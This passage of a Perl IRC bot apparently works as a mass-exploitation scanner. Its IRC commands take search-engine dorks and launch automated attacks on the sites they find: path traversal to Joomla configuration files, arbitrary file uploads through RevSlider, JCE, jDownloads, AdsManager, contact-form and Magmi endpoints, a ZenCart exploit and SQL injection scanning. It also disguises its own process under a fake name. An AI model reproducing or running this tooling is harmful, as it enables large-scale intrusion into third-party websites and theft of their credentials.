  777.                    &msg("$nick","$helplogo 15RevSlider Database Wordpress Scan :6 $revcmd  [dork]");
  778.  
  779.                    &msg("$nick","$helplogo 15Contact Mass Scanner              :6 $cfxcmd  [dork]");
  780.  
  781.                    &msg("$nick","$helplogo 15Joomla com_hdflvplayer                :6 $hdfcmd  [dork]");
  782.  
  783.                    &msg("$nick","$helplogo 15Joomla com_Jdownload              :6 $jdlcmd  [dork]");
  784.  
  785.                    &msg("$nick","$helplogo 15Joomla AdsManager                 :6 $adscmd  [dork]");
  786.  
  787.                    &msg("$nick","$helplogo 15MagEntot Database Scan                :6 $magcmd  [dork]");
  788.  
  789.                    &msg("$nick","$helplogo 15MAGeXPo Uploader                  :6 $magscmd [dork]");
  790.  
  791.                    &msg("$nick","$helplogo 15JCe Scan                          :6 $jcecmd  [dork]");
  792.  
  793.                    &msg("$nick","$helplogo 15cckjseblod Joomla Scan                :6 $cckjcmd [dork]");
  794.  
  795.                    &msg("$nick","$helplogo 15Sql Mass Scanner                  :6 $sqlcmd  [dork]");
  796.  
  797.                    &msg("$nick","$helplogo 15ZenCart Database Scan             :6 $zencmd  [dork]");
  798.  
  799.                    &msg("$nick","$helplogo 15Injector : $inject ");
  800.  
  801.                    &msg("$nick","$helplogo 15Check Bypass:6 !check");
  802.  
  803.                 }
  804.  
  805.                 if ($msg=~ /^!response/ || $msg=~ /^!id/) {
  806.  
  807.                         $inject = "";
  808.  
  809.                         if (-e ($update_file)){ $inject = "3Ready!!!"; } else { $inject = "4Lost!!!"; }
  810.  
  811.                         &msg("$chan","12Injector : $inject ");
  812.  
  813.                 }
  814.  
  815.                
  816.  
  817.                 if (&isAdmin($nick) && $msg =~ /^!pid/) {
  818.  
  819.                     &notice("$nick","6Fake Process/PID : $fakeproc - $$");
  820.  
  821.                 }
  822.  
  823.                 if ($msg=~/^!check/){
  824.  
  825.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  826.  
  827.                     &msg("$chan","9 Checking 30 Bypass..!! Please Wait!");
  828.  
  829.                                         my $bystats1 = "";my $bystats2 = "";my $bystats3 = "";my $bystats4 = "";my $bystats5 = "";my $bystats6 = "";my $bystats7 = "";my $bystats8 = "";my $bystats9 = "";my $bystats10 = "";
  830.  
  831.                                         my $bystats11 = "";my $bystats12 = "";my $bystats13 = "";my $bystats14 = "";my $bystats15 = "";my $bystats16 = "";my $bystats17 = "";my $bystats18 = "";my $bystats19 = "";my $bystats20 = "";
  832.  
  833.                                         my $bystats21 = "";my $bystats22 = "";my $bystats23 = "";my $bystats24 = "";my $bystats25 = "";my $bystats26 = "";my $bystats27 = "";my $bystats28 = "";my $bystats29 = "";my $bystats30 = "";
  834.  
  835.                                         my $cekby1 = &get_content($jack1."aankfm");
  836.  
  837.                                         if ($cekby1 =~ /aankfm/i){ $bystats1 = "6Up!!!"; } else { $bystats1 = "4lost!!!"; }
  838.  
  839.                                         my $cekby2 = &get_content($jack2."aankfm");
  840.  
  841.                                         if ($cekby2 =~ /aankfm/i){ $bystats2 = "6Up!!!"; } else { $bystats2 = "4lost!!!"; }
  842.  
  843.                                         my $cekby3 = &get_content($jack3."aankfm");
  844.  
  845.                                         if ($cekby3 =~ /aankfm/i){ $bystats3 = "6Up!!!"; } else { $bystats3 = "4lost!!!"; }
  846.  
  847.                                         my $cekby4 = &get_content($jack4."aankfm");
  848.  
  849.                                         if ($cekby4 =~ /aankfm/i){ $bystats4 = "6Up!!!"; } else { $bystats4 = "4lost!!!"; }
  850.  
  851.                                         my $cekby5 = &get_content($jack5."aankfm");
  852.  
  853.                                         if ($cekby5 =~ /aankfm/i){ $bystats5 = "6Up!!!"; } else { $bystats5 = "4lost!!!"; }
  854.  
  855.                                         my $cekby6 = &get_content($jack6."aankfm");
  856.  
  857.                                         if ($cekby6 =~ /aankfm/i){ $bystats6 = "6Up!!!"; } else { $bystats6 = "4lost!!!"; }
  858.  
  859.                                         my $cekby7 = &get_content($jack7."aankfm");
  860.  
  861.                                         if ($cekby7 =~ /aankfm/i){ $bystats7 = "6Up!!!"; } else { $bystats7 = "4lost!!!"; }
  862.  
  863.                                         my $cekby8 = &get_content($jack8."aankfm");
  864.  
  865.                                         if ($cekby8 =~ /aankfm/i){ $bystats8 = "6Up!!!"; } else { $bystats8 = "4lost!!!"; }
  866.  
  867.                                         my $cekby9 = &get_content($jack9."aankfm");
  868.  
  869.                                         if ($cekby9 =~ /aankfm/i){ $bystats9 = "6Up!!!"; } else { $bystats9 = "4lost!!!"; }
  870.  
  871.                                         my $cekby10 = &get_content($jack10."aankfm");
  872.  
  873.                                         if ($cekby10 =~ /aankfm/i){ $bystats10 = "6Up!!!"; } else { $bystats10 = "4lost!!!"; }
  874.  
  875.                                         my $cekby11 = &get_content($jack11."aankfm");
  876.  
  877.                                         if ($cekby11 =~ /aankfm/i){ $bystats11 = "6Up!!!"; } else { $bystats11 = "4lost!!!"; }
  878.  
  879.                                         my $cekby12 = &get_content($jack12."aankfm");
  880.  
  881.                                         if ($cekby12 =~ /aankfm/i){ $bystats12 = "6Up!!!"; } else { $bystats12 = "4lost!!!"; }
  882.  
  883.                                         my $cekby13 = &get_content($jack13."aankfm");
  884.  
  885.                                         if ($cekby13 =~ /aankfm/i){ $bystats13 = "6Up!!!"; } else { $bystats13 = "4lost!!!"; }
  886.  
  887.                                         my $cekby14 = &get_content($jack14."aankfm");
  888.  
  889.                                         if ($cekby14 =~ /aankfm/i){ $bystats14 = "6Up!!!"; } else { $bystats14 = "4lost!!!"; }
  890.  
  891.                                         my $cekby15 = &get_content($jack15."aankfm");
  892.  
  893.                                         if ($cekby15 =~ /aankfm/i){ $bystats15 = "6Up!!!"; } else { $bystats15 = "4lost!!!"; }
  894.  
  895.                                         my $cekby16 = &get_content($jack16."aankfm");
  896.  
  897.                                         if ($cekby16 =~ /aankfm/i){ $bystats16 = "6Up!!!"; } else { $bystats16 = "4lost!!!"; }
  898.  
  899.                                         my $cekby17 = &get_content($jack17."aankfm");
  900.  
  901.                                         if ($cekby17 =~ /aankfm/i){ $bystats17 = "6Up!!!"; } else { $bystats17 = "4lost!!!"; }
  902.  
  903.                                         my $cekby18 = &get_content($jack18."aankfm");
  904.  
  905.                                         if ($cekby18 =~ /aankfm/i){ $bystats18 = "6Up!!!"; } else { $bystats18 = "4lost!!!"; }
  906.  
  907.                                         my $cekby19 = &get_content($jack19."aankfm");
  908.  
  909.                                         if ($cekby19 =~ /aankfm/i){ $bystats19 = "6Up!!!"; } else { $bystats19 = "4lost!!!"; }
  910.  
  911.                                         my $cekby20 = &get_content($jack20."aankfm");
  912.  
  913.                                         if ($cekby20 =~ /aankfm/i){ $bystats20 = "6Up!!!"; } else { $bystats20 = "4lost!!!"; }    
  914.  
  915.                                         my $cekby21 = &get_content($jack21."aankfm");
  916.  
  917.                                         if ($cekby21 =~ /aankfm/i){ $bystats21 = "6Up!!!"; } else { $bystats21 = "4lost!!!"; }
  918.  
  919.                                         my $cekby22 = &get_content($jack22."aankfm");
  920.  
  921.                                         if ($cekby22 =~ /aankfm/i){ $bystats22 = "6Up!!!"; } else { $bystats22 = "4lost!!!"; }
  922.  
  923.                                         my $cekby23= &get_content( $jack23."aankfm");
  924.  
  925.                                         if ($cekby23 =~ /aankfm/i){ $bystats23 = "6Up!!!"; } else { $bystats23 = "4lost!!!"; }
  926.  
  927.                                         my $cekby24 = &get_content($jack24."aankfm");
  928.  
  929.                                         if ($cekby24 =~ /aankfm/i){ $bystats24 = "6Up!!!"; } else { $bystats24 = "4lost!!!"; }
  930.  
  931.                                         my $cekby25 = &get_content($jack25."aankfm");
  932.  
  933.                                         if ($cekby25 =~ /aankfm/i){ $bystats25 = "6Up!!!"; } else { $bystats25 = "4lost!!!"; }
  934.  
  935.                                         my $cekby26 = &get_content($jack26."aankfm");
  936.  
  937.                                         if ($cekby26 =~ /aankfm/i){ $bystats26 = "6Up!!!"; } else { $bystats26 = "4lost!!!"; }
  938.  
  939.                                         my $cekby27 = &get_content($jack27."aankfm");
  940.  
  941.                                         if ($cekby27 =~ /aankfm/i){ $bystats27 = "6Up!!!"; } else { $bystats27 = "4lost!!!"; }
  942.  
  943.                                         my $cekby28 = &get_content($jack28."aankfm");
  944.  
  945.                                         if ($cekby28 =~ /aankfm/i){ $bystats28 = "6Up!!!"; } else { $bystats28 = "4lost!!!"; }
  946.  
  947.                                         my $cekby29 = &get_content($jack29."aankfm");
  948.  
  949.                                         if ($cekby29 =~ /aankfm/i){ $bystats29 = "6Up!!!"; } else { $bystats29 = "4lost!!!"; }
  950.  
  951.                                         my $cekby30 = &get_content($jack30."aankfm");
  952.  
  953.                                         if ($cekby30 =~ /aankfm/i){ $bystats30 = "6Up!!!"; } else { $bystats30 = "4lost!!!"; }
  954.  
  955.                                         &msg("$chan","12 Mesin1= $bystats1 12 Mesin2= $bystats2 12 Mesin3= $bystats3 12 Mesin4= $bystats4 12Mesin5= $bystats5 12 Mesin6= $bystats6 12 Mesin7= $bystats7 12 Mesin8= $bystats8 12 Mesin9= $bystats9 12 Mesin10= $bystats10");sleep(2);
  956.  
  957.                                         &msg("$chan","12 Mesin11= $bystats11 12 Mesin12= $bystats12 12 Mesin13= $bystats13 12 Mesin14= $bystats14 12 Mesin15= $bystats15 12 Mesin16= $bystats16 12 Mesin17= $bystats17 12 Mesin18= $bystats18 12 Mesin19= $bystats19 12 Mesin20= $bystats20");sleep(2);
  958.  
  959.                                         &msg("$chan","12 Mesin21= $bystats21 12 Mesin22= $bystats22 12 Mesin23= $bystats23 12 Mesin24= $bystats24 12 Mesin25= $bystats25 12 Mesin26= $bystats26 12 Mesin27= $bystats27 12 Mesin28= $bystats28 12 Mesin29= $bystats29 12 Mesin30= $bystats30");sleep(2);
  960.  
  961.                                 }}}
  962.  
  963.                 ##################################################################### Command SCAN
  964.  
  965.                
  966.  
  967.                        
  968.  
  969.                 if ($msg =~ /^$revcmd\s+(.*)/) {
  970.  
  971.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  972.  
  973.                 my ($bug,$dork) = ("wp-admin/admin-ajax.php",$1);
  974.  
  975.                 if (-e ($update_file)) {
  976.  
  977.                 my $dork = $1;
  978.  
  979.                 my $check = &read_dorks($dork);
  980.  
  981.                 if ($check == 1) {
  982.  
  983.                 &msg("$chan","$searchlogo 4Ga bisa $nick bangsattt...itu2 aja dorkmu boss.. "); exit;
  984.  
  985.                 } else {
  986.  
  987.                 &msg("$chan","$searchlogo 11Dork :4 $dork");
  988.  
  989.                 &msg("$chan","$searchlogo 11 Starting ...");
  990.  
  991.                 sendraw("MODE $chan +m");
  992.  
  993.                 &write_dorks($dork);
  994.  
  995.                 &se_start($chan,$bug,$dork,$engine,1,$nick);
  996.  
  997.                 }
  998.  
  999.                 }else {
  1000.  
  1001.                 &msg("$chan","[ $nick ] $revlogo 4Injector is Lost!");
  1002.  
  1003.                     }
  1004.  
  1005.                     }
  1006.  
  1007.                 exit;
  1008.  
  1009.                 }
  1010.  
  1011.                 }
  1012.  
  1013.                
  1014.  
  1015.                 ##############################################################################
  1016.  
  1017.                
  1018.  
  1019.                 if ($msg =~ /^$cfxcmd\s+(.*)/) {
  1020.  
  1021.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1022.  
  1023.                 my ($bug,$dork) = ("/inc/upload.php?folder=/cfg-contactform/upload/&fileext=php",$1);
  1024.  
  1025.                 my $check = &read_dorks($dork);
  1026.  
  1027.                 if ($check == 1) {
  1028.  
  1029.                 &msg("$chan","$searchlogo 3$nick, 4Please change dork!"); exit;
  1030.  
  1031.                 } else {
  1032.  
  1033.                 &msg("$chan","$searchlogo 12Dork7 :4 $dork");
  1034.  
  1035.                 &msg("$chan","$searchlogo 6Search Engine Loading ...");
  1036.  
  1037.                 &write_dorks($dork);
  1038.  
  1039.                 &se_start($chan,$bug,$dork,$engine,2,$nick);
  1040.  
  1041.                     }
  1042.  
  1043.                     }
  1044.  
  1045.                 }
  1046.  
  1047.                 }
  1048.  
  1049.                
  1050.  
  1051.                 ################################################################################
  1052.  
  1053.                
  1054.  
  1055.                 if ($msg =~ /^$hdfcmd\s+(.*)/) {
  1056.  
  1057.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1058.  
  1059.                 my ($bug,$dork) = ("/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php",$1);
  1060.  
  1061.                 my $check = &read_dorks($dork);
  1062.  
  1063.                 if ($check == 1) {
  1064.  
  1065.                 &msg("$chan","$searchlogo 3$nick, 4Please change dork!"); exit;
  1066.  
  1067.                 } else {
  1068.  
  1069.                 &msg("$chan","$searchlogo 12Dork7 :4 $dork");
  1070.  
  1071.                 &msg("$chan","$searchlogo 6Search Engine Loading ...");
  1072.  
  1073.                 &write_dorks($dork);
  1074.  
  1075.                 &se_start($chan,$bug,$dork,$engine,3,$nick);
  1076.  
  1077.                     }
  1078.  
  1079.                     }
  1080.  
  1081.                 }
  1082.  
  1083.                 }
  1084.  
  1085.                
  1086.  
  1087.                 ################################
  1088.  
  1089.                 if ($msg =~ /^$jdlcmd\s+(.*)/) {
  1090.  
  1091.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1092.  
  1093.                 my ($bug,$dork) = ("/index.php?option=com_jdownloads&Itemid=0&view=upload",$1);
  1094.  
  1095.                 my $check = &read_dorks($dork);
  1096.  
  1097.                 if ($check == 1) {
  1098.  
  1099.                 &msg("$chan","$searchlogo 3$nick, 4Please change dork!"); exit;
  1100.  
  1101.             } else {
  1102.  
  1103.                 &msg("$chan","$searchlogo 4Dork7 :4 $dork");
  1104.  
  1105.                 &msg("$chan","$searchlogo 6Search Engine Loading ...");
  1106.  
  1107.                 &write_dorks($dork);
  1108.  
  1109.                 &se_start($chan,$bug,$dork,$engine,4,$nick);
  1110.  
  1111.             }
  1112.  
  1113.         }
  1114.  
  1115.     }
  1116.  
  1117. }
  1118.  
  1119.                 #################################
  1120.  
  1121.                 if ($msg =~ /^$adscmd\s+(.*)/) {
  1122.  
  1123.                     if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1124.  
  1125.                 my ($bug,$dork) = ("/index.php?option=com_adsmanager&task=upload&tmpl=component",$1);
  1126.  
  1127.                 my $check = &read_dorks($dork);
  1128.  
  1129.                 if ($check == 1) {
  1130.  
  1131.                 &msg("$chan","$searchlogo 3$nick, 4Please change dork!"); exit;
  1132.  
  1133.             } else {
  1134.  
  1135.                 &msg("$chan","$searchlogo 4Dork7 :4 $dork");
  1136.  
  1137.                 &msg("$chan","$searchlogo 6Search Engine Loading ...");
  1138.  
  1139.                 &write_dorks($dork);
  1140.  
  1141.                 &se_start($chan,$bug,$dork,$engine,5,$nick);
  1142.  
  1143.             }
  1144.  
  1145.         }
  1146.  
  1147.     }
  1148.  
  1149. }
  1150.  
  1151.  
  1152.  
  1153.                 if ($msg =~ /^$magcmd\s+(.*)/) {
  1154.  
  1155.                     if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1156.  
  1157.                 my $dork = $1;
  1158.  
  1159.                 my $check = &read_dorks($dork);
  1160.  
  1161.                 if ($check == 1) {
  1162.  
  1163.                 &msg("$chan","$searchlogo 3$nick, 7Please change dork!"); exit;
  1164.  
  1165.             } else {
  1166.  
  1167.                 #&msg("$chan","$maglogo 7Dork7 :7 $dork");
  1168.  
  1169.                 &msg("$chan","$searchlogo 6Search Engine Loading ...");
  1170.  
  1171.                 &write_dorks($dork);
  1172.  
  1173.                 &se_start($chan,$bug,$dork,$engine,6,$nick);
  1174.  
  1175.             }
  1176.  
  1177.         }
  1178.  
  1179.     }
  1180.  
  1181. }
  1182.  
  1183.  
  1184.  
  1185.                 if ($msg =~ /^$jcecmd\s+(.*)/) {
  1186.  
  1187.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1188.  
  1189.                 my ($bug,$dork) = ("/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b",$1);
  1190.  
  1191.                 my $check = &read_dorks($dork);
  1192.  
  1193.                 if ($check == 1) {
  1194.  
  1195.                 &msg("$chan","$searchlogo 3$nick, 7Please change dork!"); exit;
  1196.  
  1197.             } else {
  1198.  
  1199.                 #&msg("$chan","$jcelogo 7Dork7 :7 $dork");
  1200.  
  1201.                 &msg("$chan","$searchlogo 6Search Engine Loading ...");
  1202.  
  1203.                 &write_dorks($dork);
  1204.  
  1205.                 &se_start($chan,$bug,$dork,$engine,7,$nick);
  1206.  
  1207.             }
  1208.  
  1209.         }
  1210.  
  1211.     }
  1212.  
  1213. }
  1214.  
  1215. #
  1216.  
  1217.                 if ($msg =~ /^$magscmd\s+(.*)/) {
  1218.  
  1219.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1220.  
  1221.                     my ($bug,$dork) = ("/magmi/web/plugin_upload.php",$1);
  1222.  
  1223.                     my $check = &read_dorks($dork);
  1224.  
  1225.                     if ($check == 1) {
  1226.  
  1227.                     &msg("$chan","$magslogo 11Ga bisa, 4$nick Bangsattt...!!, 11itu2 aja dorkmu boss.. "); exit;
  1228.  
  1229.                     } else {
  1230.  
  1231.                     &msg("$chan","15[4@15INFO15] 4$nick 11Be Patient Scanner On 4$chan ");
  1232.  
  1233.                     &msg("$chan","$searchlogo 11 Loading Please Wait...4 Magento Uploader Started.! ");
  1234.  
  1235.                     sendraw("MODE $chan +m");
  1236.  
  1237.                     &write_dorks($dork);
  1238.  
  1239.                     &se_start($chan,$bug,$dork,$engine,8,$nick);
  1240.  
  1241.             }
  1242.  
  1243.         }
  1244.  
  1245.     }
  1246.  
  1247. }      
  1248.  
  1249. #
  1250.  
  1251.                 if ($msg =~ /^$cckjcmd\s+(.*)/) {
  1252.  
  1253.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1254.  
  1255.                 my ($bug,$dork) = ("/index.php?option=com_cckjseblod&task=download&file=configuration.php",$1);
  1256.  
  1257.                 my $check = &read_dorks($dork);
  1258.  
  1259.                 if ($check == 1) {
  1260.  
  1261.                 &msg("$chan","$cckjlogo 3$nick, 4Please change dork!"); exit;
  1262.  
  1263.                 } else {
  1264.  
  1265.                 &msg("$chan","$searchlogo 12Dork7 :4 $dork");
  1266.  
  1267.                 &msg("$chan","$searchlogo 6Search Engine Loading ...");
  1268.  
  1269.                 &write_dorks($dork);
  1270.  
  1271.                 &se_start($chan,$bug,$dork,$engine,9,$nick);
  1272.  
  1273.                     }
  1274.  
  1275.                     }
  1276.  
  1277.                 }
  1278.  
  1279.                 }
  1280.  
  1281. ####
  1282.  
  1283.                 if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
  1284.  
  1285.                 if (my $pid = fork) { waitpid($pid, 0);} else {if (fork) { exit; } else {
  1286.  
  1287.                     my ($bug,$dork) = ($1,$2);
  1288.  
  1289.                     my $check = &read_dorks($dork);
  1290.  
  1291.                     if ($check == 1) {
  1292.  
  1293.                         &msg("$chan","$sqllogo 3$nick, 4Please change dork!"); exit;
  1294.  
  1295.                     } else {
  1296.  
  1297.                 &msg("$chan","4,1[9/!\4] 13,1SiaP MeNcaRi TaRgeT...S.Q.L KoManDaN");
  1298.  
  1299.                 &msg("$chan","4,1[14/!\4] 13DoRkz 4:0 $dork ");
  1300.  
  1301.                 &msg("$chan","4,1[9/!\4] 13BuGz 4:0 $bug ");
  1302.  
  1303.                 &msg("$chan","4,1[14/!\4] 9E9x3p3l3o9i9t9i3n3g15.14.15.14.");
  1304.  
  1305.                 &write_dorks($dork);
  1306.  
  1307.                 &se_start($chan,$bug,$dork,$engine,10,$nick);
  1308.  
  1309.                             }
  1310.  
  1311.                         }
  1312.  
  1313.                     }
  1314.  
  1315.                 }
  1316.  
  1317. ####
  1318.  
  1319.                
  1320.  
  1321.                 #################################
  1322.  
  1323.                 if ($msg =~ /^$zencmd\s+(.*)/) {
  1324.  
  1325.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1326.  
  1327.                 if (-e ($zenfile)) {
  1328.  
  1329.                     my ($bug,$dork) = ("extras/curltest.php",$1);
  1330.  
  1331.                     my $check = &read_dorks($dork);
  1332.  
  1333.                 if ($check == 1) {
  1334.  
  1335.                         &msg("$chan","$zenlogo 4Ga bisa $nick bangsattt...itu2 aja dorkmu boss.. "); exit;
  1336.  
  1337.                     } else {
  1338.  
  1339.                         &msg("$chan","$zenlogo 3Si $nick lagi scan Zencart di $chan ");  
  1340.  
  1341.                         &msg("$chan","$zenlogo 12Dork :4 $dork");
  1342.  
  1343.                         &msg("$chan","14scanning zen cart started...");
  1344.  
  1345.                         sendraw("MODE $chan +m");
  1346.  
  1347.                         &write_dorks($dork);
  1348.  
  1349.                 &se_start($chan,$bug,$dork,$engine,11,$nick);      
  1350.  
  1351.                     }
  1352.  
  1353.                 }else {
  1354.  
  1355.                 &msg("$chan","[ $nick ] $zenlogo 4Injector is Lost!");
  1356.  
  1357.                     }
  1358.  
  1359.                     }
  1360.  
  1361.                 exit;
  1362.  
  1363.                 }
  1364.  
  1365.                 }
  1366.  
  1367.                
  1368.  
  1369.                 #####################################################################
  1370.  
  1371.  
  1372.  
  1373.                 }
  1374.  
  1375.             }
  1376.  
  1377.        
  1378.  
  1379.  
  1380.  
  1381.         for(my $c=0; $c<= $#lines; $c++) {
  1382.  
  1383.             $line = $lines[$c];
  1384.  
  1385.             $line = $line_temp.$line if ($line_temp);
  1386.  
  1387.             $line_temp = '';
  1388.  
  1389.             $line =~ s/\r$//;
  1390.  
  1391.             unless ($c == $#lines) {
  1392.  
  1393.                 parse("$line");
  1394.  
  1395.             } else {
  1396.  
  1397.                 if ($#lines == 0) {
  1398.  
  1399.                     parse("$line");
  1400.  
  1401.                 } elsif ($lines[$c] =~ /\r$/) {
  1402.  
  1403.                     parse("$line");
  1404.  
  1405.                 } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  1406.  
  1407.                     parse("$line");
  1408.  
  1409.                 } else {
  1410.  
  1411.                     $line_temp = $line;
  1412.  
  1413.                 }
  1414.  
  1415.             }
  1416.  
  1417.         }
  1418.  
  1419.     }
  1420.  
  1421. }
  1422.  
  1423. ##########################################################################################      Search engine
  1424.  
  1425. sub type() {
  1426.  
  1427. my ($chan,$bug,$dork,$engine,$type,$nick) = @_;
  1428.  
  1429.            if ($type == 1){$type=&revslider($chan,$bug,$dork,$engine,$nick);}
  1430.  
  1431.         elsif ($type == 2){$type=&cfx_exploit($chan,$bug,$dork,$engine,$nick);}
  1432.  
  1433.         elsif ($type == 3){$type=&hdf_exploit($chan,$bug,$dork,$engine,$nick);}
  1434.  
  1435.         elsif ($type == 4){$type=&jdl_exploit($chan,$bug,$dork,$engine,$nick);}
  1436.  
  1437.         elsif ($type == 5){$type=&ads_exploit($chan,$bug,$dork,$engine,$nick);}
  1438.  
  1439.         elsif ($type == 6){$type=&mag_exploit($chan,$bug,$dork,$engine,$nick);}
  1440.  
  1441.         elsif ($type == 7){$type=&jce_exploit($chan,$bug,$dork,$engine,$nick);}
  1442.  
  1443.         elsif ($type == 8){$type=&magmi_exploit($chan,$bug,$dork,$engine,$nick);}
  1444.  
  1445.         elsif ($type == 9){$type=&cckjseblod($chan,$bug,$dork,$engine,$nick);}
  1446.  
  1447.         elsif ($type == 10){$type=&sql_exploit($chan,$bug,$dork,$engine,$nick);}
  1448.  
  1449.         elsif ($type == 11){$type=&zen($chan,$bug,$dork,$engine,$nick);}
  1450.  
  1451. }      
  1452.  
  1453. sub se_start() {
  1454.  
  1455. my ($chan,$bug,$dork,$engine,$type,$nick) = @_;
  1456.  
  1457.  
  1458.  
  1459.         if ($engine =~ /aanK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"aanK",$type); } exit; } }
  1460.  
  1461.         if ($engine =~ /coi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"coi",$type); } exit; } }
  1462.  
  1463.         if ($engine =~ /roin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"roin",$type); } exit; } }
  1464.  
  1465.         if ($engine =~ /Keren/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"Keren",$type); } exit; } }
  1466.  
  1467.         if ($engine =~ /Beken/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"Beken",$type); } exit; } }
  1468.  
  1469.         if ($engine =~ /kangkung/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"kangkung",$type); } exit; } }
  1470.  
  1471.         if ($engine =~ /successor/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"successor",$type); } exit; } }
  1472.  
  1473.         if ($engine =~ /Brewok/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"Brewok",$type); } exit; } }
  1474.  
  1475.         if ($engine =~ /Marlboro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"Marlboro",$type); } exit; } }
  1476.  
  1477.         if ($engine =~ /Prince/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"Prince",$type); } exit; } }  
  1478.  
  1479.         if ($engine =~ /Cita-Citata/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cita-Citata",$type,$nick); } exit; } }
  1480.  
  1481.         if ($engine =~ /Depe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Depe",$type,$nick); } exit; } }
  1482.  
  1483.         if ($engine =~ /Jupe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JuPe",$type,$nick); } exit; } }
  1484.  
  1485.         if ($engine =~ /Ayu-tingting/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ayu-tingting",$type,$nick); } exit; } }
  1486.  
  1487.         if ($engine =~ /Siti-badriah/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Siti-badriah",$type,$nick); } exit; } }
  1488.  
  1489.         if ($engine =~ /Zaskia-Gotik/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Zaskia-Gotik",$type,$nick); } exit; } }
  1490.  
  1491.         if ($engine =~ /Hesty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hesty",$type,$nick); } exit; } }
  1492.  
  1493.         if ($engine =~ /InuL-darasista/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"InuL-darasista",$type,$nick); } exit; } }
  1494.  
  1495.         if ($engine =~ /Duo-Racun/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Duo-Racun",$type,$nick); } exit; } }
  1496.  
  1497.         if ($engine =~ /Juwita-Bahar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Juwita-Bahar",$type,$nick); } exit; } }
  1498.  
  1499.         if ($engine =~ /Uut/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uut",$type,$nick); } exit; } }
  1500.  
  1501.         if ($engine =~ /Tuty-Wibowo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tuty-Wibowo",$type,$nick); } exit; } }
  1502.  
  1503.         if ($engine =~ /MeLa-Berby/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MeLa-Berby",$type,$nick); } exit; } }
  1504.  
  1505.         if ($engine =~ /Ria-Amelia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ria-Amelia",$type,$nick); } exit; } }
  1506.  
  1507.         if ($engine =~ /Melinda/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Melinda",$type,$nick); } exit; } }
  1508.  
  1509.         if ($engine =~ /Dewinta-Bahar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Dewinta-Bahar",$type,$nick); } exit; } }
  1510.  
  1511.         if ($engine =~ /Lia-Emilia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lia-Emilia",$type,$nick); } exit; } }
  1512.  
  1513.         if ($engine =~ /Ade-Irma/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ade-Irma",$type,$nick); } exit; } }
  1514.  
